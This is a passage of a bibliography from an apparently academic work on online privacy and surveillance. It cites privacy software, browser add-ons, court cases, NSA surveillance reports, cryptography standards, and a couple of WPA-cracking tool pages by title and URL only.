[4] Olmstead v. United States, 277 U.S. 438, (9th Cir. 1928). Online. URL https://supreme.justia.com/cases/federal/us/277/438/case.html. Last accessed: January 20, 2015.
[5] Open Rights Group. Online. URL https://www.openrightsgroup.org/. Last accessed: January 20, 2015.
[6] Adblock Plus. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/adblock-plus/. Last accessed: January 20, 2015.
[7] BetterPrivacy. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/betterprivacy/. Last accessed: January 20, 2015.
[8] Bloody Vikings! Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/bloody-vikings/. Last accessed: January 20, 2015.
[9] C3Priv. Online. URL http://www.c3p.up.pt/c3priv/. Last accessed: January 20, 2015.
[10] ClamWin. Online. URL http://www.clamav.net/. Last accessed: January 20, 2015.
[11] Comissão Nacional de Protecção de Dados. Online. URL http://www.cnpd.pt/. Last accessed: January 20, 2015.
[12] Do Not Track Plus. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/donottrackplus/. Last accessed: January 20, 2015.
[13] DuckDuckGo for Firefox. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/duckduckgo-for-firefox. Last accessed: January 20, 2015.
[14] Electronic Frontier Foundation. Online. URL https://www.eff.org/. Last accessed: January 20, 2015.
[15] Evince. Online. URL http://projects.gnome.org/evince/. Last accessed: January 20, 2015.
[16] Mozilla Firefox. Online. URL http://www.mozilla.com/firefox/. Last accessed: January 20, 2015.
[17] Flagfox. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/flagfox. Last accessed: January 20, 2015.
[18] Flashblock. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/flashblock/. Last accessed: January 20, 2015.
[19] Force TLS. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/force-tls. Last accessed: January 20, 2015.
[20] Ghostery. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/ghostery/. Last accessed: January 20, 2015.
[21] GIMP. Online. URL http://www.gimp.org/about/introduction.html. Last accessed: January 20, 2015.
[22] KeePass. Online. URL http://keepass.info/. Last accessed: January 20, 2015.
[23] KiTTY. Online. URL http://kitty.9bis.com/. Last accessed: January 20, 2015.
[24] LibreOffice. Online. URL https://www.libreoffice.org/. Last accessed: January 20, 2015.
[25] MicroSIP. Online. URL http://microsip.org.ua/. Last accessed: January 20, 2015.
[26] NoScript. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/noscript. Last accessed: January 20, 2015.
[27] OpenVPN. Online. URL http://sourceforge.net/projects/openvpn/. Last accessed: January 20, 2015.
[28] Panopticlick. Online. URL https://panopticlick.eff.org/index.php?action=log&js=yes. Last accessed: January 20, 2015.
[29] Perspectives. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/perspectives. Last accessed: January 20, 2015.
[30] Off-the-Record Messaging. Online. URL https://otr.cypherpunks.ca/. Last accessed: January 20, 2015.
[31] NSA slides explain the PRISM data-collection program. Online. URL http://www.washingtonpost.com/wp-srv/special/politics/prism-collection-documents/. Last accessed: January 20, 2015.
[32] Self-Destructing Cookies. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/self-destructing-cookies. Last accessed: January 20, 2015.
[33] Songbird. Online. URL http://getsongbird.com/. Last accessed: January 20, 2015.
[34] Mozilla Thunderbird. Online. URL http://www.mozilla.com/thunderbird/. Last accessed: January 20, 2015.
[35] Toggle JavaScript. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/togglejs. Last accessed: January 20, 2015.
[36] Tor Project. Online. URL https://www.torproject.org/. Last accessed: January 20, 2015.
[37] Crypto Museum. Online. URL http://www.cryptomuseum.com/crypto/vernam.htm. Last accessed: January 20, 2015.
[38] VLC. Online. URL http://www.videolan.org/vlc/. Last accessed: January 20, 2015.
[39] Web of Trust. Online. URL https://addons.mozilla.org/pt-PT/firefox/addon/wot-safe-browsing-tool. Last accessed: January 20, 2015.
[40] WinSCP. Online. URL http://winscp.net/. Last accessed: January 20, 2015.
[41] WinWGET. Online. URL http://www.cybershade.us/winwget/. Last accessed: January 20, 2015.
[42] Complaint for Declaratory and Injunctive Relief ("NSA Spying Complaint"), ACLU v. NSA. Online, January 2006. URL https://www.aclu.org/national-security/nsa-spying-complaint#attach. Last accessed: January 20, 2015.
[43] NIST's policy on hash functions. Online, September 2012. URL http://csrc.nist.gov/groups/ST/hash/policy.html. Last accessed: January 20, 2015.
[44] SHA1 deprecation policy. Online, November 2013. URL http://blogs.technet.com/b/pki/archive/2013/11/12/sha1-deprecation-policy.aspx. Last accessed: January 20, 2015.
[45] Privacy and Civil Liberties Oversight Board report on the surveillance program operated pursuant to Section 702 of the Foreign Intelligence Surveillance Act, July 2014. URL http://www.wired.com/wp-content/uploads/2014/07/PCLOB-Section-702-Report-PRE-RELEASE.pdf.
[46] Google's SHA-1 deprecation plan for Chrome. Online, September 2014. URL http://www.symantec.com/connect/blogs/google-s-sha-1-deprecation-plan-chrome. Last accessed: January 20, 2015.
[47] Phasing out certificates with SHA-1 based signature algorithms. Online, September 2014. URL https://blog.mozilla.org/security/2014/09/23/phasing-out-certificates-with-sha-1-based-signature-algorithms/. Last accessed: January 20, 2015.
[48] Peter Eckersley. How unique is your web browser? URL https://panopticlick.eff.org/browser-uniqueness.pdf. Last accessed: January 20, 2015.
[49] Susan Freiwald. First principles of communications privacy. Stanford Technology Law Review, 2007.
[50] B. Kaliski. PKCS #5: Password-Based Cryptography Specification Version 2.0, RFC 2898. Online, September 2000. URL https://tools.ietf.org/html/rfc2898#page-6. Last accessed: January 20, 2015.
[51] Meltem Sönmez Turan, Elaine Barker, William Burr and Lily Chen. Recommendation for password-based key derivation part 1: Storage applications. Online, December 2010. URL http://csrc.nist.gov/publications/nistpubs/800-132/nist-sp800-132.pdf. Last accessed: January 20, 2015.
[52] Yael Onn, Michael Geva, Yaniv Druckman, Ariel Zyssman, Rom Timor, Inbal Lev, Arz Maroun, Tamar Maron, Yossi Nachmani, Yaniv Simsolo, Saar Sicklai, Adi Fuches, Maor Fishman, Shai Packer, and Lotem Pery. Privacy in the digital environment. Haifa Center of Law & Technology, 2005. ISBN 965-90924-1-5.
[53] Mike Perry. [tor-talk] Tor Browser disabling JavaScript anonymity set reduction. Online, May 2012. URL https://lists.torproject.org/pipermail/tor-talk/2012-May/024227.html. Last accessed: January 20, 2015.
[54] R.L. Rivest, A. Shamir and L. Adleman. A method for obtaining digital signatures and public-key cryptosystems. Communications of the ACM, Volume 21 Issue 2, 1978.
[55] Rodney Beede, Ryan Kroiss and Arpit Sud. Distributed WPA cracking. Online. URL https://code.google.com/p/distributed-wpa-cracking/wiki/WelcomePage. Last accessed: January 20, 2015.
[56] Warren and Brandeis. The Right to Privacy. Online, 1890. URL http://groups.csail.mit.edu/mac/classes/6.805/articles/privacy/Privacy_brand_warr2.html.
[57] Joshua Wright. coWPAtty. Online. URL http://www.willhackforsushi.com/?page_id=50. Last accessed: January 20, 2015.